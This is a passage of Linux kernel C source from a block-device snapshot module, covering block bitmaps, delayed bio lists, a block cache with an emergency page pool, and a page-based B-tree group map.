	idx = pageno & (~REFS_PER_PAGE_MASK);
	page = mpage[idx];
	mpage[idx] = 0;
	page_cache_release(page);
}

static int noinline block_map_init(struct session_struct *s,
			unsigned long long size, char *data, int optimize)
{
	struct block_map *bmap;
	unsigned long long bsize;
	unsigned int count, pages, mpages, i;
	int ret, bexists;
	struct page * tpage;
	void * tpageaddr;

	sa_debug(DEBUG_API, "s=%p, size=%llu, data=%p mode=%d\n", s, size,
						data, optimize);
	bsize = sn_round(size, 8);
	if (!bsize)
		return -EINVAL;

	tpage = NULL;
	tpageaddr = NULL;
	ret = -ENOMEM;
	bexists = 0;
	pages = sn_round(bsize, PAGE_SIZE);
	mpages = sn_round(pages, REFS_PER_PAGE);

	bmap = &s->s_blkmap;
	if (bmap->size) {
		if (unlikely(bmap->size < size))
			return -EINVAL;
		bexists = 1;
		/* we may be loading data into a larger bitmap;
		   rsize keeps the real data size */
		bmap->rsize = size;
	}
	if (!bmap->blkmap) {
		size_t memsize;

		memsize = mpages * sizeof(struct page *);
		bmap->blkmap = kmalloc(memsize, GFP_KERNEL);
		if (unlikely(!bmap->blkmap))
			return ret;
		memset(bmap->blkmap, 0, memsize);
		bmap->size = size;
		bmap->rsize = size;
	}
	if (data) {
		tpage = alloc_page(GFP_KERNEL);
		if (unlikely(!tpage)) {
			kfree(bmap->blkmap);
			bmap->blkmap = NULL;
			bmap->size = 0;
			bmap->rsize = 0;
			return ret;
		}
		tpageaddr = page_address(tpage);
		inc_get_pages(s);
	}
	sa_debug(DEBUG_BMAP, "size=%llu, blkmap=%p, pages=%u, mpages=%u\n",
			size, bmap->blkmap, pages, mpages);
	if (!bexists) {
		if (unlikely(blkmap_alloc_pages(s, bmap->blkmap, pages)))
			goto out_free;
	}
	count = PAGE_SIZE;
	for (i = 0; i < pages; i++, data += PAGE_SIZE) {
		char *kaddr;
		struct page *p;

		if (unlikely((i == pages - 1) && (bsize & (PAGE_SIZE - 1))))
			/* Don't touch count if bsize%PAGE_SIZE == 0 */
			count = bsize & (PAGE_SIZE - 1);

		if (tpageaddr) {
			ret = copy_from_user(tpageaddr, data, count);
			if (unlikely(ret)) {
				sa_warn("copy_from_user failed. data=%p, "
					"count=%d, bsize=%llu.\n", data, count,
					bsize);
				ret = -EACCES;
				goto out_free;
			}
			if (optimize) {
				int fbit;
				fbit = find_first_bit(tpageaddr, PAGE_SIZE << 3);
				if (unlikely(fbit == PAGE_SIZE << 3)) {
					blkmap_page_release(bmap->blkmap, i);
					inc_put_pages(s);
					sa_debug(DEBUG_BMAP, "empty %u\n", i);
				}
			}
		}
		p = blkmap_page(bmap->blkmap, i);
		if (p) {
			kaddr = sn_kmap_atomic(p);
			if (!tpageaddr)
				memset(kaddr, 0xff, count);
			else
				memcpy(kaddr, tpageaddr, count);
			sn_kunmap_atomic(kaddr);
		}
	}

	if (tpage) {
		page_cache_release(tpage);
		inc_put_pages(s);
	}
	return 0;

out_free:
	block_map_destroy(s);
	if (tpage) {
		page_cache_release(tpage);
		inc_put_pages(s);
	}
	return ret;
}

#ifdef USE_VZ_VZSNAP
static int noinline block_map_init_vzsnap(struct session_struct *s,
					  struct vzsnap_struct *vzs)
{
	struct block_map *bmap;
	unsigned long long size = vzs->block_max;
	unsigned long long bsize;
	unsigned int pages;
	int i, ret;

	bsize = (size + 7) / 8;

	bmap = &s->s_blkmap;
	ret = -ENOMEM;
	memset(bmap, 0, sizeof(*bmap));
	pages = (bsize + PAGE_SIZE - 1) >> PAGE_SHIFT;
	bmap->blkmap = kmalloc(pages * sizeof(struct page *), GFP_KERNEL);
	if (!bmap->blkmap)
		return ret;
	memset(bmap->blkmap, 0, pages * sizeof(struct page *));
	bmap->size = size;
	bmap->rsize = size;
#ifdef CATCH_ILLEGAL_ACCESS
	s->s_blkmap_backup.blkmap = kzalloc(pages * sizeof(struct page *), GFP_KERNEL);
	if (!s->s_blkmap_backup.blkmap)
		return ret;
	s->s_blkmap_backup.size = size;
	s->s_blkmap_backup.rsize = size;
#endif
	for (i = 0; i < pages; i++) {
		struct page **mpage;
		struct page **pg;

		if (!vzs->block_map[i])
			continue;
		pg = bmap->blkmap + (i >> REFS_PER_PAGE_SHIFT);
		if (!*pg) {
			*pg = alloc_page(GFP_KERNEL|__GFP_ZERO);
			if (!*pg)
				return -ENOMEM;
		}

		get_page(vzs->block_map[i]);
		mpage = page_address(*pg);
		mpage[i & (~REFS_PER_PAGE_MASK)] = vzs->block_map[i];
#ifdef CATCH_ILLEGAL_ACCESS
		pg = s->s_blkmap_backup.blkmap + (i >> REFS_PER_PAGE_SHIFT);
		if (!*pg) {
			*pg = alloc_page(GFP_KERNEL|__GFP_ZERO);
			if (!*pg)
				return -ENOMEM;
		}
		mpage = page_address(*pg);
		mpage[i & (~REFS_PER_PAGE_MASK)] = alloc_page(GFP_KERNEL);
		memcpy(page_address(mpage[i & (~REFS_PER_PAGE_MASK)]),
		       page_address(vzs->block_map[i]), PAGE_SIZE);
#endif
	}
	return 0;
}
#endif

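/*
 * A bitmap page holds PAGE_SIZE * 8 bits (32768 with 4 KiB pages), so
 * block bno lives on bitmap page bno >> (PAGE_SHIFT + 3) at bit
 * bno % (PAGE_SIZE * 8).  A missing page means "no bits set".
 */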
static inline int is_block_in_map(struct block_map *bmap,
					unsigned long long bno)
{
	unsigned int pageno;
	struct page *page;
	long *kaddr;
	int ret;

	if (bno >= bmap->rsize)
		return 0;

	pageno = bno >> (PAGE_SHIFT + 3);
	page = blkmap_page(bmap->blkmap, pageno);
	if (!page)
		return 0;
	kaddr = sn_kmap_atomic(page);
	ret = test_bit(bno % (PAGE_SIZE * 8), kaddr);
	sn_kunmap_atomic(kaddr);

	return ret;
}

static inline int clear_block_in_map(struct block_map *bmap,
					unsigned long long bno)
{
	unsigned int pageno;
	struct page *page;
	long *kaddr;
	int ret;

	if (bno >= bmap->rsize)
		return 1;

	pageno = bno >> (PAGE_SHIFT + 3);
	page = blkmap_page(bmap->blkmap, pageno);
	if (!page)
		return 1;
	kaddr = sn_kmap_atomic(page);
	ret = test_and_clear_bit(bno % (PAGE_SIZE * 8), kaddr);
	sn_kunmap_atomic(kaddr);
	return ret;
}

static inline void set_block_in_map(struct block_map *bmap,
					unsigned long long bno)
{
	unsigned int pageno;
	struct page *page;
	long *kaddr;

	if (bno >= bmap->rsize)
		return;

	pageno = bno >> (PAGE_SHIFT + 3);
	page = blkmap_page(bmap->blkmap, pageno);
	if (!page)
		return;
	kaddr = sn_kmap_atomic(page);
	set_bit(bno % (PAGE_SIZE * 8), kaddr);
	sn_kunmap_atomic(kaddr);
}

#define BITS_ON_PAGE (1 << (PAGE_SHIFT+3))

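/* Scan the bitmap for the next set bit at or after bno; NULL bitmap
 * pages are treated as all-zero and skipped.  Returns ~0ULL when no
 * further block is marked. */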
static unsigned long long find_next_block(struct block_map *bmap, unsigned long long bno)
{
	unsigned int lpage; /* last pageno */
	unsigned int pageno;
	unsigned int psize; /* processing page size */

	if (bno >= bmap->rsize)
		return ~0ULL; /* goto out_end; */
	psize = BITS_ON_PAGE;
	lpage = (bmap->size - 1) >> (PAGE_SHIFT + 3);
	pageno = bno >> (PAGE_SHIFT + 3);
	bno &= BITS_ON_PAGE - 1;

	for (; pageno <= lpage; pageno++) {
		void* kaddr;
		struct page* page;

		if (pageno == lpage) {
			psize = bmap->size & ((PAGE_SIZE << 3) - 1);
			if (!psize)
				psize = BITS_ON_PAGE;
		}
		page = blkmap_page(bmap->blkmap, pageno);
		if (!page)
			continue;
		kaddr = sn_kmap_atomic(page);
		bno = find_next_bit(kaddr, psize, bno);
		sn_kunmap_atomic(kaddr);
		if (bno < psize) {
			bno += (unsigned long long)pageno << (PAGE_SHIFT + 3);
			goto out;
		}
		bno = 0;
	}

	bno = ~0ULL;
out:
	return bno;
}

#define snapapi_is_not_our_bio(s, bio) \
		(sn_bio_bi_sector(bio) + (sn_bio_bi_size(bio) >> 9) < s->s_pstart || \
		sn_bio_bi_sector(bio) >= s->s_pstart + s->s_plen)
#if 0
static struct session_struct *find_by_part(struct bio *bio)
{
	struct session_struct *s;
	list_for_each_entry(s, &sessions_list, s_list) {
		if (s->s_state == SNAP_NOTINITED)
			continue;
		if ((s->s_bdev->bd_contains == bio->bi_bdev ||
				s->s_bdev == bio->bi_bdev)
				&& !snapapi_is_not_our_bio(s, bio))
			return s;
	}
	return NULL;
}

static inline struct session_struct *find_by_dev(struct block_device *bd)
{
	struct session_struct *s;
	list_for_each_entry(s, &sessions_list, s_list)
		if (s->s_bdev && (s->s_bdev->bd_contains == bd
						|| s->s_bdev == bd))
			return s;
	return NULL;
}
#endif
#ifdef HAVE_BDOPS_SUBMIT_BIO
static inline struct session_struct *find_by_fops(const struct block_device_operations *fops)
{
	struct session_struct *s;
	list_for_each_entry(s, &sessions_list, s_list)
		if (s->s_request_queue && s->s_bdev && (s->s_bdev->bd_disk->fops == fops))
			return s;
	return NULL;
}

static inline struct session_struct *find_by_fops_next(const struct block_device_operations *fops, struct session_struct *s)
{
	list_for_each_entry_continue(s, &sessions_list, s_list)
		if (s->s_request_queue && s->s_bdev && (s->s_bdev->bd_disk->fops == fops)) {
			return s;
		}
	return NULL;
}
#endif
static inline struct session_struct *find_by_queue(struct bio *bio, void *q)
{
	struct session_struct *s;
	list_for_each_entry(s, &sessions_list, s_list)
		if (s->s_request_queue == q)
			return s;
	return NULL;
}

static inline struct session_struct *find_by_queue_next(struct bio *bio,
			void *q, struct session_struct *s)
{
	list_for_each_entry_continue(s, &sessions_list, s_list)
		if (s->s_request_queue == q)
			return s;
	return NULL;
}

static inline struct session_struct *find_deadlocked(void)
{
	struct list_head *tmp;
	list_for_each(tmp, &sessions_list) {
		struct session_struct *s;
		s = list_entry(tmp, struct session_struct, s_list);
		sa_info("dev=%x state=%d\n", s->s_kdev, s->s_state);
		if (s->s_state == SNAP_DEADLOCK_ERR)
			return s;
	}
	return NULL;
}

#if 0
static int make_original_request(struct bio *bio)
{
	sn_request_queue *q;
	do {
		q = bdev_get_queue(bio->bi_bdev);
		if (!q) {
			/*
			 * This is a very sad situation. The bio can't be
			 * handled properly, but we have to call end_io
			 * because nobody will do it for us.
			 */
			sa_error("Device %x does not have a queue.\n",
				bio->bi_bdev->bd_dev);
			sn_bio_io_error(bio);
			return 1;
		}
	} while (q->make_request_fn(q, bio));
	return 0;
}
#endif

/* must be called with s_biolist_lock held*/
static void noinline flush_biolist_locked(struct session_struct * s)
{
	int pno, offset;
	struct bio *bio;

	if (!s->s_bioarr)
		return;

	while (s->s_biocount) {
		s->s_biocount--;
		pno = s->s_biocount / REFS_PER_PAGE;
		offset = s->s_biocount % REFS_PER_PAGE;
		bio = *(s->s_bioarr[pno] + offset);
		spin_unlock(&s->s_biolist_lock);
		generic_make_request(bio);
		spin_lock(&s->s_biolist_lock);
		sa_debug(DEBUG_BIO, "request sent, bh=%p\n", bio);
	}
	while (s->s_biopages) {
		pno = s->s_biopages - 1;
		free_page((unsigned long)s->s_bioarr[pno]);
		inc_put_pages(s);
		s->s_bioarr[pno] = NULL;
		s->s_biopages--;
	}
}

static void noinline flush_biolist(struct session_struct * s)
{
	spin_lock(&s->s_biolist_lock);
	flush_biolist_locked(s);
	spin_unlock(&s->s_biolist_lock);
}

static void noinline cleanup_biolist(struct session_struct * s)
{
	spin_lock(&s->s_biolist_lock);
	if (s->s_bioarr) {
		flush_biolist_locked(s);
		sa_debug(DEBUG_BIOQUE, "Free bioarr page=%p\n", s->s_bioarr);
		free_page((unsigned long)s->s_bioarr);
		inc_put_pages(s);
		s->s_bioarr = NULL;
	}
	spin_unlock(&s->s_biolist_lock);
}

static int noinline delay_bio(struct session_struct *s, struct bio *bio)
{
	int pno, idx;
	struct bio **bioptr;

	sa_debug(DEBUG_BIO, "delayed bio=%p\n", bio);

	spin_lock(&s->s_biolist_lock);
	if (s->s_biocount > MAX_BH_DELAYED - 1) {
		spin_unlock(&s->s_biolist_lock);
		sa_warn("No space for bio, count=%d.\n", s->s_biocount);
		return 1;
	}
	pno = s->s_biocount / REFS_PER_PAGE;
	idx = s->s_biocount % REFS_PER_PAGE;
	if (!s->s_bioarr[pno]) {
		s->s_bioarr[pno] = (struct bio **) get_zeroed_page(GFP_ATOMIC);
		if (!s->s_bioarr[pno]) {
			spin_unlock(&s->s_biolist_lock);
			sa_warn("No memory for bio queue, count=%d.\n",
							s->s_biocount);
			return 1;
		}
		inc_get_pages(s);
		s->s_biopages++;
	}
	bioptr = s->s_bioarr[pno];
	*(bioptr + idx) = bio;
	s->s_biocount++;
	s->s_dbios++;
	spin_unlock(&s->s_biolist_lock);

	return 0;
}
static void cleanup_chain(struct session_struct *s,
		struct sa_chain *chain, struct sa_page *sab)
{
	struct sa_page *next;

	while (sab) {
		next = sab->next;
		s->s_blkcache_pages--;
		page_cache_release(sab->page);
		inc_put_pages(s);
		kmem_cache_free(s->s_blkcachep, sab);
		sab = next;
	}
}

static void noinline cleanup_snapshot(struct session_struct *s)
{
	struct sa_chain *chain;
	int i;

	if (!s->s_blkcachep)
		return;

	for (i = 0; i < BLK_CHAINS; i++) {
		chain = sa_get_blk_chain(s, i);
		cleanup_chain(s, chain, chain->busy);
		cleanup_chain(s, chain, chain->free);
	}

#if LINUX_VERSION_CODE >= KERNEL_VERSION(2,6,19)
	kmem_cache_destroy(s->s_blkcachep);
#else
	if (kmem_cache_destroy(s->s_blkcachep))
		sa_warn("Unable to destroy cache.\n");
#endif
	s->s_blkcachep = NULL;
	return;
}

static inline void insert_into_free_list(struct sa_chain *chain,
			struct sa_page *sab)
{
	sab->next = chain->free;
	chain->free = sab;
}

static inline void insert_into_busy_list(struct sa_chain *chain,
			struct sa_page *sab)
{
	sab->next = chain->busy;
	chain->busy = sab;
}

static inline void remove_from_free_list(struct sa_chain *chain,
			struct sa_page *sab)
{
	chain->free = sab->next;
}

static inline void remove_from_busy_list(struct sa_chain *chain,
			struct sa_page *sab)
{
	chain->busy = sab->next;
}

static inline int find_free_on_page(struct sa_page *sab, int bppage,
							unsigned long long bno)
{
	int i;
	unsigned long long * bno_p;

	bno_p = &sab->bno;
	for (i = 0; i < bppage; i++, bno_p++)
		if (*bno_p == ~0ULL) {
			/* mark as busy */
			*bno_p = bno;
			return i;
		}
	sa_BUG("Busy page in free list(%p).\n", sab);
	return 0;
}

static inline int blocks_on_page(struct sa_page *sab, int bppage)
{
	int i, count;
	unsigned long long * bno_p;

	bno_p = &sab->bno;
	for (i = 0, count = 0; i < bppage; i++, bno_p++)
		if (*bno_p != ~0ULL)
			count++;
	return count;
}

static inline int find_block_on_page(struct sa_page *sab, int bppage,
							unsigned long long bno)
{
	int i;
	unsigned long long * bno_p;

	bno_p = &sab->bno;
	for (i = 0; i < bppage; i++, bno_p++)
		if (*bno_p == bno)
			return i;
	return i;
}

static inline void free_block_on_page(struct sa_page *sab, int idx)
{
	unsigned long long * bno_p;

	bno_p = &sab->bno;
	/* mark as free */
	*(bno_p + idx) = ~0ULL;
}

static struct sa_page * find_block_in_chain(struct sa_page *sab, int bppage,
			unsigned long long bno, int *idx, struct sa_page **prev, unsigned long long* sdepth)
{
	struct sa_page *p;

	p = NULL;
	while (sab) {
		*idx = find_block_on_page(sab, bppage, bno);
		*sdepth += *idx;
		if (*idx != bppage) {
			if (p)
				*prev = p;
			break;
		}
		p = sab;
		sab = sab->next;
	}
	return sab;
}

static inline void init_sa_page(struct sa_page *sab, int bppage)
{
	int i;
	unsigned long long * bno_p;

	bno_p = &sab->bno;
	bno_p++;
	for (i = 1; i < bppage; i++, bno_p++)
		*bno_p = ~0ULL;
}

static unsigned long long any_block_on_page(struct sa_page *sab, int bppage)
{
	int i;
	unsigned long long * bno_p;

	bno_p = &sab->bno;
	for (i = 0; i < bppage; i++, bno_p++)
		if (*bno_p != ~0ULL)
			return *bno_p;
	return ~0ULL;
}

static unsigned long long any_block_in_cache(struct session_struct *s)
{
	struct sa_chain *chain;
	int i, idx;
	unsigned long long ret;

	idx = 0;
	ret = ~0ULL;
	if (s->s_blkcache_pages == 0)
		return ret;
	for (i = 0; i < BLK_CHAINS; i++) {
		idx = sa_get_blk_chain_index(s->s_anyblk_chain + i);
		chain = sa_get_blk_chain(s, idx);
		spin_lock(&chain->lock);
		if (chain->busy) {
			ret = chain->busy->bno;
			spin_unlock(&chain->lock);
			break;
		}
		if (chain->free) {
			ret = any_block_on_page(chain->free, s->s_bppage);
			spin_unlock(&chain->lock);
			break;
		}
		spin_unlock(&chain->lock);
	}
	s->s_anyblk_chain = sa_get_blk_chain_index(idx + 1);
	return ret;
}

static int sa_cache_emlist_init(struct session_struct *s, int prealloc)
{
	struct sa_page *sab;
	int ret, i, delta;

	delta = snap_emergency_size >> 4;
	s->s_blkcache_emmin = snap_emergency_size - delta;
	if (!prealloc)
		return 0;

	ret = -ENOMEM;
	for (i = 0; i < snap_emergency_size; i++) {
		unsigned long tm = jiffies + msecs_to_jiffies(MEM_ALLOC_TM) + 1;
		sab = (struct sa_page *)kmem_cache_alloc(s->s_blkcachep,
						GFP_KERNEL);
		if (!sab)
			goto out;
		s->s_blkcache_empages++;
		sab->page = alloc_page(GFP_HIGHUSER);
		if (!sab->page) {
			kmem_cache_free(s->s_blkcachep, sab);
			goto out;
		}
		inc_get_pages(s);
		sab->next = s->s_blk_emlist;
		s->s_blk_emlist = sab;
		if (time_after(jiffies, tm)) {
	 		sa_warn("Note, continue with %d pages.\n",
						s->s_blkcache_empages);
			break;
		}
	}
	ret = 0;

out:
	return ret;
}

static struct sa_page * sa_cache_emget(struct session_struct *s)
{
	struct sa_page *sab;

	sab = NULL;
	spin_lock(&s->s_blkcache_emlock);
	if (s->s_blkcache_empages > s->s_blkcache_emmin) {
		sab = s->s_blk_emlist;
		s->s_blk_emlist = sab->next;
		s->s_blkcache_empages--;
		s->s_blkcache_pages++;
		goto out_unlock;
	}
	spin_unlock(&s->s_blkcache_emlock);

	sab = (struct sa_page *)kmem_cache_alloc(s->s_blkcachep, GFP_ATOMIC);
	if (!sab)
		goto get_from_list;
	sab->page = alloc_page(GFP_SNAPHIGH);
	if (!sab->page) {
		kmem_cache_free(s->s_blkcachep, sab);
		goto get_from_list;
	}
	inc_get_pages(s);
	s->s_blkcache_pages++;
	goto out;

get_from_list:
	spin_lock(&s->s_blkcache_emlock);
	sab = s->s_blk_emlist;
	if (sab) {
		s->s_blk_emlist = sab->next;
		s->s_blkcache_empages--;
		s->s_blkcache_pages++;
	}

out_unlock:
	spin_unlock(&s->s_blkcache_emlock);
out:
	return sab;
}

static void sa_cache_emput(struct session_struct *s, struct sa_page *sab)
{
	spin_lock(&s->s_blkcache_emlock);
	s->s_blkcache_pages--;
	if (s->s_blkcache_empages < snap_emergency_size) {
		sab->next = s->s_blk_emlist;
		s->s_blk_emlist = sab;
		s->s_blkcache_empages++;
		spin_unlock(&s->s_blkcache_emlock);
		return;
	}
	spin_unlock(&s->s_blkcache_emlock);
	page_cache_release(sab->page);
	inc_put_pages(s);
	kmem_cache_free(s->s_blkcachep, sab);
}

static void sa_cache_emlist_destroy(struct session_struct *s)
{
	struct sa_page *sab;

	spin_lock(&s->s_blkcache_emlock);
	while (s->s_blk_emlist) {
		sab = s->s_blk_emlist;
		s->s_blk_emlist = sab->next;
		s->s_blkcache_empages--;
		spin_unlock(&s->s_blkcache_emlock);

		page_cache_release(sab->page);
		inc_put_pages(s);
		kmem_cache_free(s->s_blkcachep, sab);
		spin_lock(&s->s_blkcache_emlock);
	}
	spin_unlock(&s->s_blkcache_emlock);
}

static inline void sa_update_session_rc_depth_stats(struct session_struct *s, unsigned long long sdepth)
{
	if (sdepth > s->s_maxrcdepth)
		s->s_maxrcdepth = sdepth;
	if (sdepth > SNAP_RCDEPTH0) {
		s->s_rcdepthcnt[0]++;
		if (sdepth > SNAP_RCDEPTH1) {
			s->s_rcdepthcnt[1]++;
			if (sdepth > SNAP_RCDEPTH2) {
				s->s_rcdepthcnt[2]++;
				if (sdepth > SNAP_RCDEPTH3) {
					s->s_rcdepthcnt[3]++;
				}
			}
		}
	}
}

static int sa_cache_chain_read(struct session_struct *s, struct sa_chain* chain,
		void *data, unsigned long long bno, int mode, unsigned int flags)
{
	struct sa_page *prev;
	struct sa_page **head;
	struct sa_page *sab;
	int idx, bppage, ret;
	char *kaddr;
	unsigned long long sdepth;

	s->s_rccalls++;
	ret = 0;
	sdepth = 0;
	bppage = s->s_bppage;
	idx = 0;
	prev = NULL;
	head = &chain->busy;
	sab = find_block_in_chain(chain->busy, bppage, bno, &idx, &prev, &sdepth);
	if (sab)
		goto copy_data;

	prev = NULL;
	head = &chain->free;
	sab = find_block_in_chain(chain->free, bppage, bno, &idx, &prev, &sdepth);
	if (sab)
		goto copy_data;
	/* not found */
	goto out;

copy_data:
	if (mode == FAKE_READ)
		goto arrange_lists;
	kaddr = sn_kmap_atomic(sab->page);
	memcpy(data, kaddr + idx * s->s_bsize, s->s_bsize);
	sn_kunmap_atomic(kaddr);
	s->s_rcblocks++;

arrange_lists:
	sa_debug(DEBUG_CACHE, "mode=%d flags=%u bno=%llu\n", mode, flags, bno);
	ret = s->s_bsize;
	if (!(flags & SNAP_READ_ONCE))
		goto out;
	s->s_fcblocks++;
	free_block_on_page(sab, idx);
	/* remove from list */
	if (prev)
		prev->next = sab->next;
	else
		*head = sab->next;
	if (bppage == 1 || !blocks_on_page(sab, bppage)) {
		sa_cache_emput(s, sab);
		goto out;
	}
	insert_into_free_list(chain, sab);
out:
	sa_update_session_rc_depth_stats(s, sdepth);
	return ret;
}

struct level0entry {
	unsigned long long key;
	unsigned long long value;
};

#define STOP_ENTRY(SP) 	((void*)SP->entry - page_address(SP->page) > \
			PAGE_SIZE - sizeof(struct level_entry))
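/*
 * group_map is a small B-tree-like structure built out of whole pages:
 * level-0 (leaf) pages hold sorted level0entry {key, value} pairs,
 * upper-level pages hold level_entry {max_key, page} slots, and
 * stack[] acts as a cursor with one entry per level.  STOP_ENTRY()
 * detects when a cursor has walked off the end of its node's page.
 */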

static void map_free(struct session_struct* s)
{
	struct stack_entry *sp, *end;
	struct group_map* map;

	map = &s->s_groupmap;
	end = sp = map->stack + map->level;
	sp->page = map->root;
	if (sp > map->stack)
		sp->entry = page_address(sp->page);
	do {
		while (sp > map->stack) {
			sp--;
			sp->page = (sp + 1)->entry->page;
			if (sp - map->stack)
				sp->entry = page_address(sp->page);
		}
		do  {
			page_cache_release(sp->page);
			inc_put_pages(s);
			if (++sp > end)
				break;
			sp->entry++;
		} while (STOP_ENTRY(sp) || !sp->entry->page);
	} while(sp <= end);
}

static void update_ioctl_counters(struct session_struct* s)
{
	sa_debug(DEBUG_INTERNALS, "s=%p(%x)\n", s, s->s_kdev);
	s->s_simulate_tm = jiffies + IOCTL_SIM_INTERVAL;
	s->s_ioctlcnt++;
	if (s->s_pid_info)
		atomic_inc(&s->s_pid_info->sn_ioctls);
}

static void simulate_ioctl(struct session_struct* s)
{
	if (time_after(jiffies, s->s_simulate_tm))
		update_ioctl_counters(s);
}

static int map_init(struct session_struct* s, unsigned long uaddr, unsigned n)
{
	int ret;
	struct page* destpage, *bubble;
	struct stack_entry* sp, *max_sp;
	struct group_map* map;

	ret = 0;
	map = &s->s_groupmap;
	memset(map->stack, 0, sizeof(map->stack));
	max_sp = map->stack;
	bubble = 0;
	destpage = 0;
	while (n) {
		unsigned copy_count;
		unsigned copy_size;
		unsigned long long max_key;
		struct level0entry* dest;

		ret = -ENOMEM;
		destpage = alloc_page(GFP_HIGHUSER);
		if (!destpage)
			break;
		inc_get_pages(s);
		dest = (struct level0entry*)kmap(destpage);
		if (!dest)
			break;
		ret = 0;
		copy_count = PAGE_SIZE / sizeof(struct level0entry);
		while (copy_count > n)
			dest[--copy_count].key = ~0;
		copy_size = copy_count * sizeof(struct level0entry);
		if (copy_from_user(dest, (void*)uaddr, copy_size)) {
			ret = -EACCES;
			kunmap(destpage);
			break;
		}
		uaddr += copy_size;
		n -= copy_count;
		bubble = map->stack[0].page;
		max_key = map->stack[0].max_key;
		map->stack[0].page = destpage;
		map->stack[0].max_key = dest[copy_count - 1].key;
		kunmap(destpage);
		destpage = 0;
		for (sp = &map->stack[1]; bubble; sp++) {
			if (!sp->page) {
				sp->page = alloc_page(GFP_KERNEL);
				if (!sp->page) {
					ret = -ENOMEM;
					break;
				}
				inc_get_pages(s);
				sp->entry = page_address(sp->page);
			}
			sp->entry->page = bubble;
			sp->entry->max_key = sp->max_key = max_key;
			sp->entry++;
			if (STOP_ENTRY(sp)) {
				bubble = sp->page;
				sp->page = 0;
			} else {
				/*sp->entry->page = 0; ???*/
				bubble = 0;
			}
		}
		if (--sp > max_sp)
			max_sp = sp;
	}
	for (sp = &map->stack[1]; sp <= max_sp; sp++) {
		if (!sp->page) {
			sp->page = alloc_page(GFP_KERNEL);
			if (!sp->page) {
				ret = -ENOMEM;
				break;
			}
			inc_get_pages(s);
			sp->entry = page_address(sp->page);
		}
		sp->entry->page = (sp - 1)->page;
		sp->entry->max_key = map->stack[0].max_key;
		sp->entry++;
		(sp - 1)->page = 0;
		for (; !STOP_ENTRY(sp); sp->entry++) {
			sp->entry->max_key = ~0;
			sp->entry->page = 0;
		}
	}
	map->max_key = map->stack[0].max_key;
	map->level = --sp - map->stack;
	map->root = sp->page;
	sp->page = 0;
	if (destpage) {
		page_cache_release(destpage);
		inc_put_pages(s);
	}
	if (bubble) {
		page_cache_release(bubble);
		inc_put_pages(s);
	}
	for (sp = map->stack; sp <= max_sp; sp++)
		if (sp->page) {
			page_cache_release(sp->page);
			inc_put_pages(s);
		}
	if (ret)
		map_free(s);
	return ret;
}

static void map_init_iterator(struct group_map* map)
{
	struct stack_entry* sp;

	map->stack[map->level].page = map->root;
	for (sp = map->stack + map->level; sp > map->stack; ) {
		sp->entry = page_address(sp->page);
		sp--;
		sp->page = (sp+1)->entry->page;
	}
	map->stack[0].entry = kmap(map->stack[0].page);
}

static struct level0entry* map_iterator_get_value(struct group_map* map)
{
	return (struct level0entry*)map->stack[0].entry;
}

static int map_iterator_next(struct group_map* map)
{
	struct stack_entry* sp;

	struct stack0entry {
		struct page* page;
		struct level0entry* entry;
	}* sp0;

	sp0 = (struct stack0entry*)map->stack;
	sp0->entry++;

	if ((void*)(sp0->entry + 1) > page_address(sp0->page) + PAGE_SIZE ||
					sp0->entry->key > map->max_key) {
		kunmap(sp0->page);
		for (sp = map->stack + 1; sp <= map->stack + map->level; sp++) {
			sp->entry++;
			if (!STOP_ENTRY(sp) && sp->entry->page)
				break;
		}
		if (sp > map->stack + map->level)
			return 0;

		while (sp > map->stack) {
			sp--;
			sp->page = (sp+1)->entry->page;
			sp->entry = sp - map->stack ? page_address(sp->page)
							: kmap(sp->page);
		}
	}
	return 1;
}

static void map_iterator_stop(struct group_map* map)
{
	kunmap(map->stack[0].page);
}

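/*
 * Binary search down the tree.  On success the leaf page is left
 * kmap()ed and returned via *entry_page; the caller must kunmap() it
 * when done (see sa_cache_save()).
 */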
static struct level0entry* map_search(struct group_map* map, unsigned long long key,
						struct page** entry_page)
{
	int level;
	struct page* page;
	int i, l, r;
	struct level0entry* array0;

	if (key > map->max_key)
		return 0;

	page = map->root;

	for (level = map->level; level; level--) {
		struct level_entry* array;

		array = page_address(page);
		l = 0;
		r = PAGE_SIZE / sizeof(struct level_entry) - 1;
		do {
			i = (l + r)/2;
			if (array[i].max_key >= key)
				r = i;
			else
				l = i + 1;
		} while (r != l);
		page = array[r].page;
	}

	array0 = kmap(page);
	l = 0;
	r = PAGE_SIZE / sizeof(struct level0entry) - 1;
	do {
		i = (l + r)/2;
		if (array0[i].key > key)
			r = i - 1;
		else if (array0[i].key < key)
			l = i + 1;
		else {
			*entry_page = page;
			return &array0[i];
		}
	} while (r >= l);
	*entry_page = NULL;
	kunmap(page);
	return 0;
}

#define sa_cache_chain_remove(s, chain, bno) \
	sa_cache_chain_read(s, chain, 0, bno, FAKE_READ, SNAP_READ_ONCE)

static int sa_cache_save(struct session_struct *s, void *data,
					unsigned long long bno)
{
	struct sa_page *sab;
	struct sa_chain *chain;
	int idx, bppage, ret, new_page;
	char *kaddr;
	struct group_entry* entry;
	struct page* entry_page;

	ret = 1;
	idx = 0;
	new_page = 0;
	bppage = s->s_bppage;
	entry_page = 0;
	entry = 0;

	sa_debug(DEBUG_API, "bno=%llu\n", bno);

	if (s->s_state == SNAP_READINGMAP && s->s_usemap)
		entry = (struct group_entry*)map_search(&s->s_groupmap, bno, &entry_page);

	chain = sa_get_blk_chain(s, bno);
	spin_lock(&chain->lock);

	/* The block may be already read while we were waiting on bio */
	if (!(s->s_state == SNAP_READINGMAP && s->s_usemap ?
			!!entry :
			!!is_block_in_map(&s->s_blkmap, bno))) {
		s->s_rwcolls++;
		ret = 0;
		goto out_unlock;
	}

	if (s->s_state == SNAP_READINGMAP)
		sa_cache_chain_remove(s, chain, bno);

	if (bppage > 1 && chain->free) {
		sab = chain->free;
		idx = find_free_on_page(sab, bppage, bno);
		goto copy_data;
	}
	sab = sa_cache_emget(s);
	if (!sab)
		goto out_unlock;
	sab->bno = bno;
	new_page = 1;
	if (bppage > 1)
		init_sa_page(sab, bppage);

copy_data:
	kaddr = sn_kmap_atomic(sab->page);
	memcpy(kaddr + idx * s->s_bsize, data, s->s_bsize);
	sn_kunmap_atomic(kaddr);

	if (s->s_state == SNAP_READINGMAP && s->s_usemap) {
		if (!entry->init)
			sa_debug(DEBUG_API, "INITING group %u bno = %llu\n",
						entry->group, entry->bno);
		entry->init = entry->cached = 1;
	} else if (s->s_state != SNAP_READINGMAP)
		clear_block_in_map(&s->s_blkmap, bno);

	s->s_cblocks++;
	if (s->s_cblocks - s->s_fcblocks > s->s_mcblocks)
